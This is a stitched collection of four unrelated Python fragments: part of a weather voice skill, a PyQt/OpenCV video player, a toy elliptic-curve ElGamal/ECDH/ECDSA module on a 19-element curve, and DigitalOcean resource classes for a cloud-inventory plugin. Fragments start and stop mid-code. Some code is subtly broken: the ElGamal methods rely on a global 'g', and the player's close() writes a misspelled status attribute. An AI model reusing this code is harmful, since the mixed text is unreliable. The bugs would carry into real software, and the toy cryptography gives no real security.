dialog = 'forecast.' + dialog
self.speak_dialog(dialog, report)
def __handle_typed(self, message, response_type):
try:
unit = self.__get_requested_unit(message)
# Get a date from requests like "weather for next Tuesday"
today = extract_datetime(" ")[0]
when, _, _ = extract_datetime(
message.data.get('utterance'), lang=self.lang)
report = self.__initialize_report(message)
if today != when:
LOG.info("Doing a forecast" + str(today) + " " + str(when))
return self.report_forecast(report, when,
dialog=response_type)
# Get current conditions
currentWeather = self.owm.weather_at_place(
report['full_location'], report['lat'],
report['lon']).get_weather()
# Change encoding of the localized report to utf8 if needed
condition = currentWeather.get_detailed_status()
if self.owm.encoding != 'utf8':
condition = self.__translate(
condition.encode(self.owm.encoding).decode('utf8')
)
report['condition'] = condition
report['temp'] = pronounce_number(int(self.__get_temperature(currentWeather, 'temp',
unit)),self.lang)
report['icon'] = currentWeather.get_weather_icon_name()
# Get forecast for the day
# can get 'min', 'max', 'eve', 'morn', 'night', 'day'
# Set time to 12 instead of 00 to accomodate for timezones
forecastWeather = self.__get_forecast(
today.replace(
hour=12),
report['full_location'],
report['lat'],
report['lon'])
report['temp_min'] = pronounce_number(int(self.__get_temperature(forecastWeather, 'min',
unit)),self.lang)
report['temp_max'] = pronounce_number(int(self.__get_temperature(forecastWeather, 'max',
unit)),self.lang)
report['humidity'] = forecastWeather.get_humidity()
wind = self.get_wind_speed(forecastWeather)
report['wind'] = "{} {}".format(wind[0], wind[1] or "")
self.__report_weather('current', report, response_type)
self.mark2_forecast(report)
except HTTPError as e:
self.__api_error(e)
except Exception as e:
LOG.exception("Error: {0}".format(e))
def __populate_report(self, message):
try:
unit = self.__get_requested_unit(message)
# Get a date from requests like "weather for next Tuesday"
today = extract_datetime(" ")[0]
when, _,_ = extract_datetime(
message.data.get('utterance'), lang=self.lang)
report = self.__initialize_report(message)
if today != when:
LOG.info("Doing a forecast" + str(today) + " " + str(when))
return self.__populate_forecast(report, when)
# Get current conditions
currentWeather = self.owm.weather_at_place(
report['full_location'], report['lat'],
report['lon']).get_weather()
# Change encoding of the localized report to utf8 if needed
condition = currentWeather.get_detailed_status()
if self.owm.encoding != 'utf8':
condition = self.__translate(
condition.encode(self.owm.encoding).decode('utf8')
)
report['condition'] = condition
report['temp'] = pronounce_number(int(self.__get_temperature(currentWeather, 'temp',
unit)),self.lang)
report['icon'] = currentWeather.get_weather_icon_name()
# Get forecast for the day
# can get 'min', 'max', 'eve', 'morn', 'night', 'day'
# Set time to 12 instead of 00 to accomodate for timezones
forecastWeather = self.__get_forecast(
today.replace(
hour=12),
report['full_location'],
report['lat'],
report['lon'])
report['temp_min'] = pronounce_number(int(self.__get_temperature(forecastWeather, 'min',
unit)),self.lang)
report['temp_max'] = pronounce_number(int(self.__get_temperature(forecastWeather, 'max',
unit)),self.lang)
report['humidity'] = forecastWeather.get_humidity()
if report['location']=='london, gb':
report['location'] = 'لندن'
elif report['location']=='cairo, eg':
report['location'] = 'القاهرة'
elif report['location']=='dubai, ae':
report['location'] = 'دبي'
elif report['location']=='riyadh, sa':
report['location'] = 'الرياض'
elif report['location']=='jeddah, sa':
report['location'] = 'جده'
elif report['location']=='Washington, US':
report['location'] = 'واشنطن'
elif report['location']=='mecca, sa':
report['location'] = 'مكه'
wind = self.get_wind_speed(forecastWeather)
report['wind'] = "{} {}".format(wind[0], wind[1] or "")
return report
except HTTPError as e:
self.__api_error(e)
except Exception as e:
LOG.exception("Error: {0}".format(e))
return None
def __populate_forecast(self, report, when, unit=None):
""" Populate the report and return it.
Arguments:
report (dict): report base
when : date for report
unit: Unit type to use when presenting
Returns: None if no report available otherwise dict with weather info
"""
forecast_weather = self.__get_forecast(
when, report['full_location'], report['lat'], report['lon'])
if forecast_weather is None:
return None # No forecast available
# Can get temps for 'min', 'max', 'eve', 'morn', 'night', 'day'
report['temp'] = pronounce_number(int(self.__get_temperature(forecast_weather, 'day', unit)),self.lang)
report['temp_min'] = pronounce_number(int(self.__get_temperature(forecast_weather, 'min',
unit)),self.lang)
report['temp_max'] = pronounce_number(int(self.__get_temperature(forecast_weather, 'max',
unit)),self.lang)
report['icon'] = forecast_weather.get_weather_icon_name()
report['humidity'] = forecast_weather.get_humidity()
if report['location']=='london, gb':
report['location'] = 'لندن'
elif report['location']=='cairo, eg':
report['location'] = 'القاهرة'
elif report['location']=='dubai, ae':
report['location'] = 'دبي'
elif report['location']=='riyadh, sa':
report['location'] = 'الرياض'
elif report['location']=='jeddah, sa':
report['location'] = 'جده'
elif report['location']=='Washington, US':
report['location'] = 'واشنطن'
elif report['location']=='mecca, sa':
report['location'] = 'مكه'
"""report['wind'] = self.get_wind_speed(forecast_weather)[0]"""
# TODO: Run off of status IDs instead of the status text? This converts a status like "sky is clear" to
# a different text and tense, because you don't want: "Friday it will be 82 and the sky is clear", it
# should be 'Friday it will be 82 and the sky will be clear' or just 'Friday it will be 82 and clear.
report['condition'] = self.__translate(
forecast_weather.get_detailed_status(), True)
report['day'] = self.__to_day(when) # Tuesday, tomorrow, etc.
return report
def report_forecast(self, report, when, dialog='weather', unit=None):
""" Speak forecast for specific day.
Arguments:
report (dict): report base
when : date for report
dialog (str): dialog type, defaults to 'weather'
unit: Unit type to use when presenting
"""
report = self.__populate_forecast(report, when, unit)
if report is None:
self.speak_dialog("no forecast", {'day': self.__to_day(when)})
return
self.__report_weather('forecast', report, rtype=dialog)
def report_threeday_forecast(self, report, dialog='weather', unit=None):
""" Speak forecast for today, tomorrow and next day.
Arguments:
report (dict): report base
when : date for report
dialog (str): dialog type, defaults to 'weather'
unit: Unit type to use when presenting
"""
days = [extract_datetime(" ")[0],
extract_datetime("tomorrow", lang="en-us")[0],
extract_datetime("48 hours", lang="en-us")[0]]
for day in days:
report = self.__populate_forecast(report, day, unit)
if report is None:
self.speak_dialog("no forecast", {'day': self.__to_day(day)})
return
self.__report_weather('forecast', report, rtype=dialog)
# Handle: When will it rain again? | Will it rain on Tuesday?
@intent_handler(IntentBuilder("").require("Query").require(
"Next").require("Precipitation").optionally("Location").build())
def handle_next_precipitation(self, message):
report = self.__initialize_report(message)
# Get a date from spoken request
today = extract_datetime(" ")[0]
when = extract_datetime(message.data.get('utterance'),
lang=self.lang)[0]
# search the forecast for precipitation
for weather in self.owm.daily_forecast(
report['full_location'],
report['lat'],
report['lon'], 10).get_forecast().get_weathers():
forecastDate = datetime.fromtimestamp(weather.get_reference_time())
if when != today:
# User asked about a specific date, | |
if the thread has been requested to terminate or not.
"""
lock = QReadLocker(self._lock)
return self._teminationFlag
#---------------------------------------------
def fps(self):
"""
Gets the Frame Rate of the video currently opened.
Returns
-------
fps: int
Value of the Frame Rate (in frames per second) of the video opened
or -1 if no video is opened.
"""
lock = QReadLocker(self._lock)
return self._fps
#---------------------------------------------
def totalFrames(self):
"""
Gets the total number of frames in the video currently opened.
Returns
-------
total: int
Total number of frames in the video opened or 0 if no video is
opened.
"""
lock = QReadLocker(self._lock)
return self._totalFrames
#---------------------------------------------
def _getFrame(self):
"""
Gets the next frame of the video to display.
Returns
-------
position: int
Number of the frame read, or -1 if failed.
frame: numpy.ndarray
Image of the frame read, or None if failed.
"""
if self.mediaStatus() != MediaStatus.Opened:
return -1, None
lock = QWriteLocker(self._lock)
ret, frame = self._video.read()
if not ret:
return -1, None
else:
self._currentFrame += 1
return self._currentFrame, frame
#---------------------------------------------
def mediaStatus(self):
"""
Thread-save read access to the media status.
Returns
-------
status: MediaStatus
Value of the current media status.
"""
lock = QReadLocker(self._lock)
return self._mediaStatus
#---------------------------------------------
def setMediaStatus(self, status):
"""
Thread-save write access to the media status.
Parameters
----------
status: MediaStatus
Value to update the media status to.
"""
lock = QWriteLocker(self._lock)
self._mediaStatus = status
#---------------------------------------------
def playbackStatus(self):
"""
Thread-save read access to the playback status.
Returns
-------
status: PlaybackStatus
Value of the current playback status.
"""
lock = QReadLocker(self._lock)
return self._playbackStatus
#---------------------------------------------
def setPlaybackStatus(self, status):
"""
Thread-save write access to the playback status.
Parameters
----------
status: PlaybackStatus
Value to update the playback status to.
"""
lock = QWriteLocker(self._lock)
self._playbackStatus = status
#---------------------------------------------
def open(self, fileName):
"""
Opens the given video for playing.
Parameter
---------
fileName: str
Path and name of the video file to open.
Returns
-------
ret: bool
Indication of success in opening the video file.
"""
video = cv2.VideoCapture(fileName)
if video is None:
return False
lock = QWriteLocker(self._lock)
if self._video is not None:
self._video.release()
self._video = video
self._videoFileName = fileName
self._fps = self._video.get(cv2.CAP_PROP_FPS)
self._currentFrame = -1
self._totalFrames = self._video.get(cv2.CAP_PROP_FRAME_COUNT)
self._mediaStatus = MediaStatus.Opened
self._playbackStatus = PlaybackStatus.Stopped
self.opened.emit(self._totalFrames)
return True
#---------------------------------------------
def close(self):
"""
Closes the currently opened video file.
"""
if self.mediaStatus() == MediaStatus.Opened:
lock = QWriteLocker(self._lock)
self._playbackStatus = PlaybackStatus.Stopped
self._medisStatus = MediaStatus.Closed
self._fps = 0
self._totalFrames = 0
self._currentFrame = -1
self._video.release()
self._videoFileName = ""
self.closed.emit()
#---------------------------------------------
def play(self):
"""
Plays the currently opened video.
"""
if self.playbackStatus() != PlaybackStatus.Playing:
self.setPlaybackStatus(PlaybackStatus.Playing)
#---------------------------------------------
def pause(self):
"""
Pauses the currently opened video.
"""
if self.playbackStatus() not in (PlaybackStatus.Paused,
PlaybackStatus.Stopped):
self.setPlaybackStatus(PlaybackStatus.Paused)
#---------------------------------------------
def stop(self):
"""
Stops the currently opened video.
"""
if self.playbackStatus() != PlaybackStatus.Stopped:
self.setPlaybackStatus(PlaybackStatus.Stopped)
#---------------------------------------------
def seek(self, position):
"""
Seeks the video, going to the given frame position.
Parameters
----------
position: int
Position (i.e. number of the frame) where to seek the video.
"""
print('seeking to {}'.format(position))
if self.mediaStatus() != MediaStatus.Opened:
return
lock = QWriteLocker(self._lock)
self._video.set(cv2.CAP_PROP_POS_FRAMES, position)
self._currentFrame = self._video.get(cv2.CAP_PROP_POS_FRAMES) - 1
#---------------------------------------------
def run(self):
"""
Runs the threaded processing of the video.
It is important to remember that this is the only method that, in fact,
runs in a different thread. All other methods will run in the same
thread of the GUI.
"""
while not self.isTerminated():
start = datetime.now()
status = self.playbackStatus()
if status == PlaybackStatus.Playing:
pos, frame = self._getFrame()
if frame is None:
self.stop()
else:
self.playback.emit(pos, frame)
end = datetime.now()
elapsed = (end - start)
fps = self.fps()
if fps == 0:
fps = 30
delay = int(max(1, ((1 / fps) - elapsed.total_seconds()) * 1000))
self.msleep(delay)
#=============================================
class VideoWidget(QWidget):
"""
Implements the video controller that presents the contents of a video read
with the VideoPlayer class.
"""
#---------------------------------------------
def __init__(self, player, parent = None):
"""
Class constructor.
Parameters
----------
player: VideoPlayer
Instance of the video player used to read the the video.
parent: QWidget
Parent widget. The default is None.
"""
super().__init__(parent)
self._player = player
"""
Instance of the video player used to read the the video.
"""
self._frame = VideoFrameWidget(self)
"""
Widget to display the video frames.
"""
self._slider = VideoSliderWidget(self)
"""
Slider widget used to display and control the video progress.
"""
# Perform the signal connections
self._player.opened.connect(self.opened)
self._player.closed.connect(self.closed)
self._player.playback.connect(self.playback)
self._slider.positionChanged.connect(self._positionChanged)
self.setLayout(QVBoxLayout())
self.layout().setContentsMargins(0, 0, 0, 0)
self.layout().addWidget(self._frame)
self.layout().addWidget(self._slider)
self.setMinimumSize(self.sizeHint())
self._slider.setEnabled(False)
#---------------------------------------------
def sizeHint(self):
"""
Gets the preferred size for this widget.
Returns
-------
size: QSize
Preferred size of the widget.
"""
return QSize(256, 144)
#---------------------------------------------
def opened(self, totalFrames):
"""
Captures the opened signal from the VideoPlayer class.
"""
self._slider.setMax(totalFrames)
self._slider.setPosition(0)
self._slider.setEnabled(True)
#---------------------------------------------
def closed(self):
"""
Captures the closed signal from the VideoPlayer class.
"""
self._frame.setFrame(None)
self._slider.setPosition(0)
self._slider.setEnabled(False)
#---------------------------------------------
def playback(self, position, frame):
"""
Captures the playback signal from the VideoPlayer class.
Parameters
----------
position: int
Number of the frame in the video to display.
frame: numpy.ndarray
Image of the frame to display.
"""
self._frame.setFrame(frame)
self._slider.setPosition(position)
#---------------------------------------------
def _positionChanged(self, position):
"""
Captures the position changed signal emitted by the slider in order
to position the video playing.
Parameters
----------
position: int
Position (frame number) where to seek the video to.
"""
self._player.seek(position)
#=============================================
class VideoFrameWidget(QWidget):
"""
Implements the displayer of video frames used by the VideoWidget class.
"""
#---------------------------------------------
def __init__(self, parent = None):
"""
Class constructor.
Parameters
----------
parent: QWidget
Parent widget. The default is None.
"""
super().__init__(parent)
self._image = None
"""
QImage currently displayed.
"""
self.setAutoFillBackground(False)
self.setAttribute(Qt.WA_NoSystemBackground, True)
#---------------------------------------------
def setFrame(self, frame):
"""
Sets the image of the video frame to display.
Parameters
----------
frame: numpy.ndarray
OpenCV's image of the video frame to be displayed.
"""
height, width, byteValue = frame.shape
byteValue *= width
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self._image = QImage(frame, width, height, byteValue,
QImage.Format_RGB888)
self.repaint()
#---------------------------------------------
def paintEvent(self, event):
"""
Captures the paint event in order to draw the video frame.
"""
painter = QPainter(self)
painter.fillRect(event.rect(), Qt.black)
if self._image is not None:
size = self.size()
image = self._image.scaled(size, Qt.KeepAspectRatio,
Qt.SmoothTransformation)
x = self.width() // 2 - image.width() // 2
y = self.height() // 2 - image.height() // 2
painter.drawImage(x, y, image)
#=============================================
class CustomSlider(QSlider):
"""
A custom slider with a nice style sheet and with jump clicking implemented.
"""
#---------------------------------------------
def __init__(self, parent = None):
"""
Class constructor.
Parameters
----------
parent: QWidget
Parent widget. The default is None.
"""
super(CustomSlider, self).__init__(Qt.Horizontal, parent)
self.setRange(0, 100)
self.setPageStep(10)
self.setStyleSheet(
'QSlider::groove:horizontal'
'{'
' border: 1px solid #bbb;'
' background: white;'
' height: 10px;'
' border-radius: 4px;'
'}'
''
'QSlider::sub-page:horizontal'
'{'
' background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1, '
' stop: 0 #669999, stop: 1 #d1e0e0);'
' background: qlineargradient(x1: 0, y1: 0.2, x2: 1, y2: 1, '
' stop: 0 #d1e0e0, stop: 1 #85adad);'
' border: 1px solid #777;'
' height: 10px;'
' border-radius: 4px;'
'}'
''
'QSlider::add-page:horizontal'
'{'
' background: #fff;'
' border: 1px solid #777;'
' height: 10px;'
' border-radius: 4px;'
'}'
''
'QSlider::handle:horizontal'
'{'
' background: qlineargradient(x1:0, y1:0, x2:1, y2:1, '
' stop:0 #eee, stop:1 #ccc);'
' border: 1px solid #777;'
' width: 30px;'
' margin-top: -2px;'
' margin-bottom: -2px;'
' border-radius: 5px;'
'}'
''
'QSlider::handle:horizontal:hover'
'{'
' background: qlineargradient(x1:0, y1:0, x2:1, y2:1,'
' stop:0 #fff, stop:1 #ddd);'
' border: 1px solid #444;'
' border-radius: 5px;'
'}'
''
'QSlider::sub-page:horizontal:disabled'
'{'
' background: #bbb;'
' border-color: #999;'
'}'
''
'QSlider::add-page:horizontal:disabled'
'{'
' background: #eee;'
' border-color: #999;'
'}'
''
'QSlider::handle:horizontal:disabled'
'{'
' background: #eee;'
' border: 1px solid #aaa;'
' border-radius: 4px;'
'}'
)
#---------------------------------------------
def mousePressEvent(self, event):
"""
Captures the mouse press event to implement the jump click (i.e. allows
the handle to jump to the position clicked by the user instead of
emulating a page-up or page-down - the default behavior).
Parameters
----------
event: QMousePressEvent
Object with the event received.
"""
opt = QStyleOptionSlider()
self.initStyleOption(opt)
handleRect = self.style().subControlRect(QStyle.CC_Slider, opt,
QStyle.SC_SliderHandle, self)
if event.button() == Qt.LeftButton and \
not handleRect.contains(event.pos()):
halfHandleWidth = (0.5 * handleRect.width()) + 0.5
adaptedPosX = event.x()
| |
import collections
def inv(n, q):
"""div on PN modulo a/b mod q as a * inv(b, q) mod q
>>> assert n * inv(n, q) % q == 1
"""
# n*inv % q = 1 => n*inv = q*m + 1 => n*inv + q*-m = 1
# => egcd(n, q) = (inv, -m, 1) => inv = egcd(n, q)[0] (mod q)
return egcd(n, q)[0] % q
#[ref] naive implementation
#for i in range(q):
# if (n * i) % q == 1:
# return i
# pass
#assert False, "unreached"
#pass
def egcd(a, b):
"""extended GCD
returns: (s, t, gcd) as a*s + b*t == gcd
>>> s, t, gcd = egcd(a, b)
>>> assert a % gcd == 0 and b % gcd == 0
>>> assert a * s + b * t == gcd
"""
s0, s1, t0, t1 = 1, 0, 0, 1
while b > 0:
q, r = divmod(a, b)
a, b = b, r
s0, s1, t0, t1 = s1, s0 - q * s1, t1, t0 - q * t1
pass
return s0, t0, a
def sqrt(n, q):
"""sqrt on PN modulo: returns two numbers or exception if not exist
>>> assert (sqrt(n, q)[0] ** 2) % q == n
>>> assert (sqrt(n, q)[1] ** 2) % q == n
"""
assert n < q
for i in range(1, q):
if i * i % q == n:
return (i, q - i)
pass
raise Exception("not found")
Coord = collections.namedtuple("Coord", ["x", "y"])
class EC(object):
"""System of Elliptic Curve"""
def __init__(self, a, b, q):
"""elliptic curve as: (y**2 = x**3 + a * x + b) mod q
- a, b: params of curve formula
- q: prime number
"""
assert 0 < a and a < q and 0 < b and b < q and q > 2
assert (4 * (a ** 3) + 27 * (b ** 2)) % q != 0
self.a = a
self.b = b
self.q = q
# just as unique ZERO value representation for "add": (not on curve)
self.zero = Coord(0, 0)
pass
def is_valid(self, p):
if p == self.zero: return True
l = (p.y ** 2) % self.q
r = ((p.x ** 3) + self.a * p.x + self.b) % self.q
return l == r
def at(self, x):
"""find points on curve at x
- x: int < q
- returns: ((x, y), (x,-y)) or not found exception
>>> a, ma = ec.at(x)
>>> assert a.x == ma.x and a.x == x
>>> assert a.x == ma.x and a.x == x
>>> assert ec.neg(a) == ma
>>> assert ec.is_valid(a) and ec.is_valid(ma)
"""
assert x < self.q
ysq = (x ** 3 + self.a * x + self.b) % self.q
y, my = sqrt(ysq, self.q)
return Coord(x, y), Coord(x, my)
def neg(self, p):
"""negate p
>>> assert ec.is_valid(ec.neg(p))
"""
return Coord(p.x, -p.y % self.q)
def add(self, p1, p2):
"""<add> of elliptic curve: negate of 3rd cross point of (p1,p2) line
>>> d = ec.add(a, b)
>>> assert ec.is_valid(d)
>>> assert ec.add(d, ec.neg(b)) == a
>>> assert ec.add(a, ec.neg(a)) == ec.zero
>>> assert ec.add(a, b) == ec.add(b, a)
>>> assert ec.add(a, ec.add(b, c)) == ec.add(ec.add(a, b), c)
"""
if p1 == self.zero: return p2
if p2 == self.zero: return p1
if p1.x == p2.x and (p1.y != p2.y or p1.y == 0):
# p1 + -p1 == 0
return self.zero
if p1.x == p2.x:
# p1 + p1: use tangent line of p1 as (p1,p1) line
l = (3 * p1.x * p1.x + self.a) * inv(2 * p1.y, self.q) % self.q
pass
else:
l = (p2.y - p1.y) * inv(p2.x - p1.x, self.q) % self.q
pass
x = (l * l - p1.x - p2.x) % self.q
y = (l * (p1.x - x) - p1.y) % self.q
return Coord(x, y)
def mul(self, p, n):
"""n times <mul> of elliptic curve
>>> m = ec.mul(p, n)
>>> assert ec.is_valid(m)
>>> assert ec.mul(p, 0) == ec.zero
"""
r = self.zero
m2 = p
# O(log2(n)) add
while 0 < n:
if n & 1 == 1:
r = self.add(r, m2)
pass
n, m2 = n >> 1, self.add(m2, m2)
pass
# [ref] O(n) add
#for i in range(n):
# r = self.add(r, p)
# pass
return r
def order(self, g):
"""order of point g
>>> o = ec.order(g)
>>> assert ec.is_valid(a) and ec.mul(a, o) == ec.zero
>>> assert o <= ec.q
"""
assert self.is_valid(g) and g != self.zero
for i in range(1, self.q + 1):
if self.mul(g, i) == self.zero:
return i
pass
raise Exception("Invalid order")
pass
class ElGamal(object):
"""ElGamal Encryption
pub key encryption as replacing (mulmod, powmod) to (ec.add, ec.mul)
- ec: elliptic curve
- g: (random) a point on ec
"""
def __init__(self, ec, g):
assert ec.is_valid(g)
self.ec = ec
self.g = g
self.n = ec.order(g)
pass
def gen(self, priv):
"""generate pub key
- priv: priv key as (random) int < ec.q
- returns: pub key as points on ec
"""
return self.ec.mul(g, priv)
def enc(self, plain, pub, r):
"""encrypt
- plain: data as a point on ec
- pub: pub key as points on ec
- r: randam int < ec.q
- returns: (cipher1, ciper2) as points on ec
"""
assert self.ec.is_valid(plain)
assert self.ec.is_valid(pub)
return (self.ec.mul(g, r), self.ec.add(plain, self.ec.mul(pub, r)))
def dec(self, cipher, priv):
"""decrypt
- chiper: (chiper1, chiper2) as points on ec
- priv: private key as int < ec.q
- returns: plain as a point on ec
"""
c1, c2 = cipher
assert self.ec.is_valid(c1) and ec.is_valid(c2)
return self.ec.add(c2, self.ec.neg(self.ec.mul(c1, priv)))
pass
class DiffieHellman(object):
"""Elliptic Curve <NAME> (Key Agreement)
- ec: elliptic curve
- g: a point on ec
"""
def __init__(self, ec, g):
self.ec = ec
self.g = g
self.n = ec.order(g)
pass
def gen(self, priv):
"""generate pub key"""
assert 0 < priv and priv < self.n
return self.ec.mul(self.g, priv)
def secret(self, priv, pub):
"""calc shared secret key for the pair
- priv: my private key as int
- pub: partner pub key as a point on ec
- returns: shared secret as a point on ec
"""
assert self.ec.is_valid(pub)
assert self.ec.mul(pub, self.n) == self.ec.zero
return self.ec.mul(pub, priv)
pass
class DSA(object):
"""ECDSA
- ec: elliptic curve
- g: a point on ec
"""
def __init__(self, ec, g):
self.ec = ec
self.g = g
self.n = ec.order(g)
pass
def gen(self, priv):
"""generate pub key"""
assert 0 < priv and priv < self.n
return self.ec.mul(self.g, priv)
def sign(self, hashval, priv, r):
"""generate signature
- hashval: hash value of message as int
- priv: priv key as int
- r: random int
- returns: signature as (int, int)
"""
assert 0 < r and r < self.n
m = self.ec.mul(self.g, r)
return (m.x, inv(r, self.n) * (hashval + m.x * priv) % self.n)
def validate(self, hashval, sig, pub):
"""validate signature
- hashval: hash value of message as int
- sig: signature as (int, int)
- pub: pub key as a point on ec
"""
assert self.ec.is_valid(pub)
assert self.ec.mul(pub, self.n) == self.ec.zero
w = inv(sig[1], self.n)
u1, u2 = hashval * w % self.n, sig[0] * w % self.n
p = self.ec.add(self.ec.mul(self.g, u1), self.ec.mul(pub, u2))
return p.x % self.n == sig[0]
pass
if __name__ == "__main__":
# shared elliptic curve system of examples
ec = EC(1, 18, 19)
g, _ = ec.at(7)
assert ec.order(g) <= ec.q
# ElGamal enc/dec usage
eg = ElGamal(ec, g)
# mapping value to ec point
# "masking": value k to point ec.mul(g, k)
# ("imbedding" on proper n:use a point of x as 0 <= n*v <= x < n*(v+1) < q)
mapping = [ec.mul(g, i) for i in range(eg.n)]
plain = mapping[7]
priv = 5
pub = eg.gen(priv)
cipher = eg.enc(plain, pub, 15)
decoded = eg.dec(cipher, priv)
assert decoded == plain
| |
from dataclasses import dataclass
from typing import ClassVar, Dict, List, Optional
import resotolib.logger
from resotolib.baseresources import (
BaseAccount,
BaseDatabase,
BaseInstance,
BaseIPAddress,
BaseLoadBalancer,
BaseNetwork,
BaseRegion,
BaseResource,
BaseSnapshot,
BaseVolume,
InstanceStatus,
VolumeStatus,
BaseBucket,
BaseEndpoint,
BaseCertificate,
BaseKeyPair,
BaseDomain,
BaseDomainRecord,
)
from resotolib.graph import Graph
from resoto_plugin_digitalocean.client import get_team_credentials
from resoto_plugin_digitalocean.client import StreamingWrapper
from .utils import dump_tag
log = resotolib.logger.getLogger("resoto." + __name__)
@dataclass(eq=False)
class DigitalOceanResource(BaseResource): # type: ignore
"""A class that implements the abstract method delete() as well as update_tag()
and delete_tag().
delete() must be implemented. update_tag() and delete_tag() are optional.
"""
kind: ClassVar[str] = "digitalocean_resource"
urn: str = ""
def delete_uri_path(self) -> Optional[str]:
return None
def tag_resource_name(self) -> Optional[str]:
"""Resource name in case tagging is supported by digitalocean.
Not all resources support tagging.
"""
return None
def delete(self, graph: Graph) -> bool:
"""Delete a resource in the cloud"""
delete_uri_path = self.delete_uri_path()
if delete_uri_path:
log.debug(
f"Deleting resource {self.id} in account {self.account(graph).id} region {self.region(graph).id}"
)
team = self.account(graph)
credentials = get_team_credentials(team.id)
if credentials is None:
raise RuntimeError(
f"Cannot delete resource {self.id}, credentials not found for team {team.id}"
)
client = StreamingWrapper(
credentials.api_token,
credentials.spaces_access_key,
credentials.spaces_secret_key,
)
return client.delete(delete_uri_path, self.id)
raise NotImplementedError
def update_tag(self, key: str, value: str) -> bool:
tag_resource_name = self.tag_resource_name()
if tag_resource_name:
log.debug(f"Updating tag {key} on resource {self.id}")
team = self._account
credentials = get_team_credentials(team.id)
if credentials is None:
raise RuntimeError(
f"Cannot update tag on resource {self.id}, credentials not found for team {team.id}"
)
client = StreamingWrapper(
credentials.api_token,
credentials.spaces_access_key,
credentials.spaces_secret_key,
)
if key in self.tags:
# resotocore knows about the tag. Therefore we need to clean it first
tag_key = dump_tag(key, self.tags.get(key))
client.untag_resource(tag_key, tag_resource_name, self.id)
# we tag the resource using the key-value formatted tag
tag_kv = dump_tag(key, value)
tag_ready: bool = True
tag_count = client.get_tag_count(tag_kv)
# tag count call failed irrecoverably, we can't continue
if isinstance(tag_count, str):
raise RuntimeError(f"Tag update failed. Reason: {tag_count}")
# tag does not exist, create it
if tag_count is None:
tag_ready = client.create_tag(tag_kv)
return tag_ready and client.tag_resource(tag_kv, tag_resource_name, self.id)
else:
raise NotImplementedError(f"resource {self.kind} does not support tagging")
def delete_tag(self, key: str) -> bool:
tag_resource_name = self.tag_resource_name()
if tag_resource_name:
log.debug(f"Deleting tag {key} on resource {self.id}")
team = self._account
credentials = get_team_credentials(team.id)
if credentials is None:
raise RuntimeError(
f"Cannot update tag on resource {self.id}, credentials not found for team {team.id}"
)
client = StreamingWrapper(
credentials.api_token,
credentials.spaces_access_key,
credentials.spaces_secret_key,
)
if key not in self.tags:
# tag does not exist, nothing to do
return False
tag_key = dump_tag(key, self.tags.get(key))
untagged = client.untag_resource(tag_key, tag_resource_name, self.id)
if not untagged:
return False
tag_count = client.get_tag_count(tag_key)
if tag_count == 0:
return client.delete("/tags", tag_key)
return True
else:
raise NotImplementedError(f"resource {self.kind} does not support tagging")
@dataclass(eq=False)
class DigitalOceanTeam(DigitalOceanResource, BaseAccount): # type: ignore
"""DigitalOcean Team"""
kind: ClassVar[str] = "digitalocean_team"
@dataclass(eq=False)
class DigitalOceanRegion(DigitalOceanResource, BaseRegion): # type: ignore
"""DigitalOcean region"""
kind: ClassVar[str] = "digitalocean_region"
do_region_slug: Optional[str] = None
do_region_features: Optional[List[str]] = None
is_available: Optional[bool] = None
do_region_droplet_sizes: Optional[List[str]] = None
@dataclass(eq=False)
class DigitalOceanProject(DigitalOceanResource, BaseResource): # type: ignore
"""DigitalOcean project"""
kind: ClassVar[str] = "digitalocean_project"
owner_uuid: Optional[str] = None
owner_id: Optional[str] = None
description: Optional[str] = None
purpose: Optional[str] = None
environment: Optional[str] = None
is_default: Optional[bool] = None
def delete_uri_path(self) -> Optional[str]:
return "/projects"
@dataclass(eq=False)
class DigitalOceanDroplet(DigitalOceanResource, BaseInstance): # type: ignore
"""A DigitalOcean Droplet Resource
Droplet have a class variable `instance_status_map` which contains
a mapping from the droplet status string the cloud API returns
to our internal InstanceStatus state.
"""
kind: ClassVar[str] = "digitalocean_droplet"
instance_status_map: ClassVar[Dict[str, InstanceStatus]] = {
"new": InstanceStatus.BUSY,
"active": InstanceStatus.RUNNING,
"off": InstanceStatus.TERMINATED,
"archive": InstanceStatus.TERMINATED,
}
droplet_backup_ids: Optional[List[str]] = None
is_locked: Optional[bool] = None
droplet_features: Optional[List[str]] = None
droplet_image: Optional[str] = None
def delete_uri_path(self) -> Optional[str]:
return "/droplets"
def _instance_status_setter(self, value: str) -> None:
"""Setter that looks up the instance status
Based on the string that was give we're doing a dict lookup
for the corresponding instance status and assign it or
InstanceStatus.UNKNOWN.
"""
self._instance_status = self.instance_status_map.get(
value, InstanceStatus.UNKNOWN
)
def tag_resource_name(self) -> Optional[str]:
return "droplet"
# Because we are using dataclasses and allow to supply the `instance_status`
# string to the constructor we can not use the normal @property decorator.
# Instead we assign the property once the class has been fully defined.
DigitalOceanDroplet.instance_status = property(
DigitalOceanDroplet._instance_status_getter,
DigitalOceanDroplet._instance_status_setter,
)
@dataclass(eq=False)
class DigitalOceanKubernetesCluster(DigitalOceanResource, BaseResource): # type: ignore
"""DigitalOcean Kubernetes Cluster"""
kind: ClassVar[str] = "digitalocean_kubernetes_cluster"
k8s_version: Optional[str] = None
k8s_cluster_subnet: Optional[str] = None
k8s_service_subnet: Optional[str] = None
ipv4_address: Optional[str] = None
endpoint: Optional[str] = None
auto_upgrade_enabled: Optional[bool] = None
cluster_status: Optional[str] = None
surge_upgrade_enabled: Optional[bool] = None
registry_enabled: Optional[bool] = None
ha_enabled: Optional[bool] = None
def delete_uri_path(self) -> Optional[str]:
return "/kubernetes/clusters"
@dataclass(eq=False)
class DigitalOceanVolume(DigitalOceanResource, BaseVolume): # type: ignore
kind: ClassVar[str] = "digitalocean_volume"
volume_status_map: ClassVar[Dict[str, VolumeStatus]] = {
"creating": VolumeStatus.BUSY,
"available": VolumeStatus.AVAILABLE,
"in-use": VolumeStatus.IN_USE,
"deleting": VolumeStatus.BUSY,
"deleted": VolumeStatus.DELETED,
"error": VolumeStatus.ERROR,
"busy": VolumeStatus.BUSY,
}
description: Optional[str] = None
filesystem_type: Optional[str] = None
filesystem_label: Optional[str] = None
def delete_uri_path(self) -> Optional[str]:
return "/volumes"
def _volume_status_setter(self, value: str) -> None:
self._volume_status = self.volume_status_map.get(value, VolumeStatus.UNKNOWN)
def tag_resource_name(self) -> Optional[str]:
return "volume"
DigitalOceanVolume.volume_status = property(
DigitalOceanVolume._volume_status_getter, DigitalOceanVolume._volume_status_setter
)
